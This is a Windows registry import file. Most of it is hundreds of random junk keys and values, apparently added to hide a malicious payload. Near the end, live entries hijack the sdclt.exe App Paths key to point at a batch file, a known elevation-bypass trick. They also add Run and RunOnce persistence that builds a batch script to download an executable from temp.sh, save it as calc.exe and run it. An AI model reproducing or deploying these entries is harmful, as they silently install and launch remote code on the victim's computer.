Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\RV6HWA356Q]
"x0rS84aIKg"="cfTE7UJsoN"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\TcjOHBmlef]
"7MrTEPFlzF"="8p1JYoBQBl"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\XXGSrv5cvj]
"qL453Xdacb"="6n7KvkAx4U"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\VT2O7gMjlo]
"6CF437xr3H"="tdA6VEVo3G"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\sOSO4QrPbp]
"jRCkOjnjmk"="OwtkgQAAjb"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\4nB9RfrZWI]
"r7ycBwakbu"="xl21k70jpD"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\QWcuHVlP37]
"t5XZ6Dti0s"="oQrV0XT5dn"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\SS1S6WI84g]
"VHeZuEW4KE"="9IM4HKbd5X"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\ppl7y7eGvn]
"zctXbsTehp"="sLKcCnWs4x"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\m9CnCt2bto]
"Q91VultwBj"="nSeTgsMzkv"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\YnaHVrZYUM]
"2bcwLE9ad2"="X9fIzSEpuA"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\nWWQ1PVCYm]
"3Goskjw1Nb"="JE4Kkanqan"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\kH09yfdra7]
"FryYOufU9y"="2WK92sUonk"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\RdaXy0tOBU]
"ixNEsOxBme"="7K7esHRn1g"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\yZ0CdjPsaM]
"GRaT0ZQ2mt"="16IXUckRlS"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\fbdPNbwFo3]
"0ayzNqhozb"="TxghI50Tcm"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\XnyuewP5dJ]
"Hn4g3f4U0N"="kS5ppe8fYj"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\MEjCIEB8Ip]
"eEopDYeVxC"="bKgTzqpcKH"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\JzyrcRn7GH]
"QFDNo8bz8V"="PIzC8Jgzb8"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\hsairOSpWZ]
"p6h6tm0Fdd"="VdIHhghHSr"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\h13SqdQzGi]
"P8nSpz1WdW"="DClKKwADow"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\Gjgxer6xQy]
"qq2ymEQul8"="ftNAL6vgH6"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\Pj6dTZjwr4]
"kKZLY0kN2V"="MXMBnHwj9v"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\Y9pPnk1rLS]
"4BQ0reQwNd"="iDBLhydEqR"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\a96rVHHztB]
"16EkEmDk5U"="4UO5nzI3GC"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\m5GrRRoCG7]
"QYV4eieQeu"="uWXIYx46iz"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\vDnZ3OtmEb]
"2ykWGVMvzC"="xTAV9pF3Vi"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\znEXfjGweS]
"xpwFB3fqCt"="hOkUM0Vyd8"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\FVuL9BQMBq]
"1tbvQvctx7"="unTEjcdKWg"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\fky6xArkjU]
"J5JTpx5ZQj"="oY9z9mr0V5"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\k5i510Zbkq]
"xT8SeFygmM"="JkE34K7gBT"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\wjND0CoMM2]
"IZ1CWfl1fY"="X5Ctc91pXi"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\ODpelDsOZa]
"Z02Lo5PGpi"="7q6kePLeJ7"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\B0QkTAzQtC]
"QgmRT7PeOr"="GEzLtLPrJC"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\TjXK5OoKN1]
"OzifdzNQke"="w7JOeZcISq"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\PWY6odvPrx]
"VyypYOU5yU"="X7drewZF1E"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\GdtZK4QN6U]
"VtgOdDKkm3"="WV4qdcWi8r"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\vbGqYD0Gyn]
"Yb69JpK2me"="horXQ1dDwm"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\HK2XZdFJSr]
"bVPlEX47Zq"="vqYP93Sppj"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\oQV897vSqG]
"KffoKP3iDy"="IzGGXu5umI"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\zuwQ30uDxX]
"PUjQkDtCKn"="J6etZD6ZYc"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\Ft1vTO1x7I]
"kO91tpNOP5"="LgXuTCYYk4"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\pL3BSpLWPQ]
"drha4kGR8n"="xrUdjakgMU"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\H53jP11p1M]
"AEldvNuUb9"="KzS0XwTPhP"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\KiRG75Di3a]
"q9ZHJfUxAV"="MB2RS5ZjRE"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\cVn7pzTUuc]
"2g7JerSZiQ"="w1ApNcPIqw"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\EpSyZELvj6]
"qdP00F6Elq"="HULIcAX6Sb"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\ZF2PqzaCbL]
"aa2pAzFKk2"="SMb4GqiUo2"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\8HRU1GNUb1]
"W4gvPXP9jz"="n0K3WGVbE0"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\cE8ogpncka]
"b1dKPEq8Oz"="dF4vNo8guF"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\ymH9HYVN6f]
"2mOMtjHOii"="CjUxX3Tm7O"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\XhOBWdQaFf]
"SLQDmO6zRf"="vlDmHcwZ1W"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\EASnT7sRhJ]
"3Tx3JL5K1q"="g3rzOyVKQB"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\MwruLJGsU3]
"ndiIWaXafe"="1ISaeF7nad"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\F7guVYDUPi]
"jILjYIsQ62"="Mxw9NW0tPY"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\kcdJFY23pN]
"IXOVonVpDQ"="UaDEtvnekc"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\exYAbIvpPg]
"uJ6UesUAdw"="NHN0WrhNkd"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\sVJ69y5XzW]
"a09snix6z9"="J29YjEmLBK"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\vuDE9Tkjno]
"Baz0BNM7zS"="iJq1huWpG0"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\xAgwswS40F]
"zUSKOfxDvN"="EL1qmZ4Mye"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\FhLUzNBTxA]
"MI6X6YPdh1"="1gDcsBDnCP"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\Ym5hsZb8Qo]
"eYCEJAIe8K"="491iEGsOEQ"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\AFaoaN4kW0]
"9AXYzJtpke"="rNAHZuoAjq"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\W3rfrTkuDS]
"9EioYn4IqD"="qr3FtthUVj"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\Sfui5FjHk3]
"UzTGhMVV43"="J4HRGTOisW"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\ACXQ6411Yu]
"wnaJmN3vFl"="FUTsjPCAJc"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\h9r7DwyQj6]
"e0wkK9LoiL"="TIOuGzunJs"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\qOQ51UfGpT]
"9o7duqDfpK"="J3yh8xeJZy"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\FAGKWBWbwf]
"uGmfr8PSK0"="7nlNX7TK7Z"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\tCovA6kJRl]
"LElyafvwVx"="HgGhuwUgoX"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\jZGSiGCW8g]
"TwuWUrv716"="2b5AK5FTxs"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\5PC2pdZLFG]
"dDpluy0SzV"="oTsO3evwph"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\sYJr0lffV6]
"GEV9mUrbuV"="Ts0PZ8WJ0k"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\o9hdvriW5N]
"niPCcE0Wip"="AOrPFb9TjW"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\iQuSYqQEbm]
"Q4bC0QD6EV"="pSoswP9V25"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\D6ZOBNcIaY]
"V8Dv4Ks6BG"="9ZY1bTTrDw"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\7LE0hUlTTr]
"KLTae2rISU"="dJTrGhsuty"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\v1XljnZsl4]
"gE3y1HW5rE"="xJ4mTKu7Eq"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\U84inFrCSs]
"Dp71Ux2lwf"="7JxrfQE7RS"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\1Sd3HWQso9]
"QSZ6DtEalN"="zJQL3ylymF"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\GqYo6pMQrA]
"vkROwUOqti"="jOzwgvpVyO"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\ghWr6rwAqt]
"aSmwqVrlWG"="seWbBy6IEN"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\AyC3uOlKr9]
"ZdXbV4acPP"="sAJdtZEuHa"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\DYHlsY8WGO]
"ctnApFez5c"="x9suwG3O5T"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\AmVmnddNPB]
"7WP95wcMsY"="65bmLtb2wj"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\jebCLq776L]
"LnYZRZ5Nhl"="Y3Khqpslj9"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\RJVXuNAGeb]
"6v7FaYEwBV"="BiYkdJnwK6"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\Uzz85hWDHe]
"cBdQBah6qM"="dcCygZiDbf"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\wwhBuDYfFL]
"feyqnxqjZk"="mnHlAcV0zI"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\2U6CrRRC3v]
"99H1n19lyG"="B8bdKqrlu5"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\85pSq3IoVd]
"XR0RuLN5DA"="hGggxqOKiJ"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\chxfxY91QW]
"Utf3rdWIWt"="yE8LrpF26z"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\FQWyMDm9bV]
"Xvd6B3fYxi"="4uciezCZcQ"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\mCGZ0L0hGP]
"29KeO7EK88"="rElbfRYlYr"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\l6VND5vWFb]
"mMsdL7hgdo"="8fffsGFapH"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\AanoVQIba7]
"RftKrzV2nq"="DW0oixgVe6"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\lQwe6IDALM]
"M8vm0Vk75v"="APb8dTCAbC"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\5UO8Ziv5IK]
"9c2qoI4AJ6"="z1raFY6HkL"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\6sa8fwCdsT]
"BihdpCWn5y"="FxEGRCrFS6"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\Cqf8uXkE8p]
"Ps7CGRsXdw"="pd2pXkpp7k"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\AcoPSUXBgy]
"GE41L1fhem"="Jg4IiPkR0R"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\MaOVv87r5U]
"7F2iORfla1"="6xZ0OCjcS4"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\cjIWjStjrC]
"QNyi8NiY2x"="V09tpfRRNF"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\xEpot5b9hD]
"CbgSlfI1az"="i38qPFlGtc"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\DkK71couTd]
"dEU6u28Y21"="1RlnfVvw8D"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\6N1QNV3cQv]
"Ieu9xyicp8"="tI4uEMFxPA"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\BVU9MnyGb5]
"zPttWnQNms"="qhzrusAorG"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\PAkCFI4RDv]
"zDkaPJP4XH"="f5fp2K75zy"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\8A3XBYTPG6]
"L4XQ2Hjj92"="OATmb4Dxft"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\jvo2SPJ9bM]
"vo7BYdYY4H"="j8pLHwK2a1"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\XMfPgjj5pN]
"rPgwAFS9G4"="OGtHNa315I"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\3NrplVf5x9]
"GYvbfBCxdc"="Fou0UtWmzp"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\aqVLlsJ5Jf]
"sMCLFdSaph"="O3uXPZnp4P"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\2t4vOnWpaO]
"L3wA8SMCxK"="P6YCSY0IBJ"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\q7IalfJejT]
"zXNbAW0q8N"="1ZH1xsap3A"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\VtIUnP01so]
"oucjIutXPK"="MdADNtVPJc"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\7bPQrfaP1D]
"TG7qGdEzTs"="YjQXHuTYKa"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\SDYg1qk4Mk]
"9tGbY9pAjc"="fEGSxgtbQj"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\8NWXgUQkJk]
"PWbxC9SqSd"="yba2CExIVv"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\YB07W53Wbi]
"bylV2fgdoM"="r5wMWCWITq"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\N8OdjSKZGL]
"GBPulHGqck"="qE9gmAjpAh"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\jwHPbH52UL]
"B7hI0tbniI"="ZEgLkUwLZH"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\cwiNxtiiyS]
"WoYK59iqtd"="GZCc0hojvP"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\Nq2zzljAta]
"zu3B1tyHJv"="Q7Sf3YMh5z"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\w8qRuVS9A9]
"AHQxLhaRGh"="EWdKnZCb17"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\f0WeG6z9qq]
"L6rRYVCgK3"="XklkVigH1a"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\lKzUpBVkeO]
"fH1kscwIiz"="ZNXOIoBx3u"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\6SBra6J9DL]
"zRmcwYXfbn"="KIjcoiC6q6"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\nnG5Q5hr0j]
"1o2zrsgbVx"="8HxKLaXxt5"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\PBImEIYeCQ]
"7BeT36gy9X"="utJ3fcDYJm"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\Vc3QILPme9]
"mpBVPFEYKn"="RGsEthc1gY"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\Xs0f1L2fCH]
"ecgP0lpdc6"="K4O9PHcf52"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\AppID\\11YrL89CbC]
"DtABJ2kHP3"="W4lvbiqx6W"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\LItB1E7UC8]
"3Zp0C7sDxM"="c4sWqJmeUI"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\SZIMgBXzMr]
"NGjpNvYz7d"="nV7pJj15pr"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\D3fgiQKFAn]
"5nMsQ4PnNU"="a9ymqgy3kU"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\xCNvtYkAyW]
"YZdNTt2sEN"="FqO8A66C1c"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Interface\\Yl4gzm8Od9]
"tyFgXZBAhC"="iayYM0QsNu"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\YqtNvTCgYq]
"biZKyTcoOD"="EXOLhnLdKw"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\HccRLXilAf]
"1SImCeuxLw"="2fWzyIn15U"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\aOZUKWx6ok]
"f8tDsuTbTF"="71aIz1nBH1"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\xkQAnk68Z7]
"IvAx11H9S4"="V3W1JLGYfr"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\agIHcxm5LD]
"RUjoC78Pya"="4PIiaJrQeK"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\FAEhgE1S6o]
"JQUZNhec70"="ukdRojEQ2J"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\h7jnTfi9Rn]
"0jojU74ssB"="Aj8gpgIhRB"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\ig0XL2xIxD]
"tBeGYFSSr6"="g03F9BVmSg"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\UvXRR8xaUj]
"JpyQ7H5bJr"="oCXizrWjsh"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\\13yHclxiGU]
"nX9Ewml6Mh"="qaK3LKLVJp"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\blyhk87Ew6]
"eto7lRMqAG"="uI6tPGunJV"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\huGBtYdCdm]
"ragudQfeby"="djPMJroV4K"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\sdclt.exe]
"Path"="C:\\Users\\Public\\Videos\\"
@="c:\\Users\\public\\nvSyIS6i.bat"

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"nvSyIS6i"="cmd /c \"(echo echo @echo off & echo curl https://temp.sh/hVGAy/1.exe -o %temp%\\calc.exe & echo %temp%\\calc.exe & echo exit)\" > %temp%\\nvSyIS6i.bat"
"QFR8zwWj"="cmd /c echo start /min cmd /c %temp%\\nvSyIS6i.bat >> c:\\Users\\public\\nvSyIS6i.bat"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"nvSyIS6i"="c:\\Users\\public\\nvSyIS6i.bat"

[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\RV6HWA356Q]
"x0rS84aIKg"="cfTE7UJsoN"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\TcjOHBmlef]
"7MrTEPFlzF"="8p1JYoBQBl"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\XXGSrv5cvj]
"qL453Xdacb"="6n7KvkAx4U"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\VT2O7gMjlo]
"6CF437xr3H"="tdA6VEVo3G"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\sOSO4QrPbp]
"jRCkOjnjmk"="OwtkgQAAjb"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\4nB9RfrZWI]
"r7ycBwakbu"="xl21k70jpD"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\\QWcuHVlP37]
"t5XZ6Dti0s"="oQrV0XT5dn"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\SS1S6WI84g]
"VHeZuEW4KE"="9IM4HKbd5X"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\ppl7y7eGvn]
"zctXbsTehp"="sLKcCnWs4x"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\m9CnCt2bto]
"Q91VultwBj"="nSeTgsMzkv"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\YnaHVrZYUM]
"2bcwLE9ad2"="X9fIzSEpuA"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\nWWQ1PVCYm]
"3Goskjw1Nb"="JE4Kkanqan"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\kH09yfdra7]
"FryYOufU9y"="2WK92sUonk"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\\RdaXy0tOBU]
"ixNEsOxBme"="7K7esHRn1g"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\yZ0CdjPsaM]
"GRaT0ZQ2mt"="16IXUckRlS"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\fbdPNbwFo3]
"0ayzNqhozb"="TxghI50Tcm"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\\XnyuewP5dJ]
"Hn4g3f4U0N"="kS5ppe8fYj"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\MEjCIEB8Ip]
"eEopDYeVxC"="bKgTzqpcKH"


[HKEY_CURRENT_USER\SOFTWARE\Classes\\JzyrcRn7GH]
"QFDNo8bz8V"="PIzC8Jgzb8"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\hsairOSpWZ]
"p6h6tm0Fdd"="VdIHhghHSr"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\TypeLib\\h13SqdQzGi]
"P8nSpz1WdW"="DClKKwADow"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden\SHOWALL\\Gjgxer6xQy]
"qq2ymEQul8"="ftNAL6vgH6"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\Pj6dTZjwr4]
"kKZLY0kN2V"="MXMBnHwj9v"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\Interface\\Y9pPnk1rLS]
"4BQ0reQwNd"="iDBLhydEqR"


[HKEY_CURRENT_USER\SOFTWARE\Classes\TypeLib\\a96rVHHztB]
"16EkEmDk5U"="4UO5nzI3GC"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\m5GrRRoCG7]
"QYV4eieQeu"="uWXIYx46iz"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\\vDnZ3OtmEb]
"2ykWGVMvzC"="xTAV9pF3Vi"


[HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\\znEXfjGweS]
"xpwFB3fqCt"="hOkUM0Vyd8"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\FVuL9BQMBq]
"1tbvQvctx7"="unTEjcdKWg"


[HKEY_CURRENT_USER\SOFTWARE\Classes\Wow6432Node\CLSID\\fky6xArkjU]
"J5JTpx5ZQj"="oY9z9mr0V5"


[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\\k5i510Zbkq]
"xT8SeFygmM"="JkE34K7gBT"


[HKEY_CURRENT_USER\SOFTWARE\Classes\AppID\\wjND0CoMM2]
"IZ1CWfl1fY"="X5Ctc91pXi"


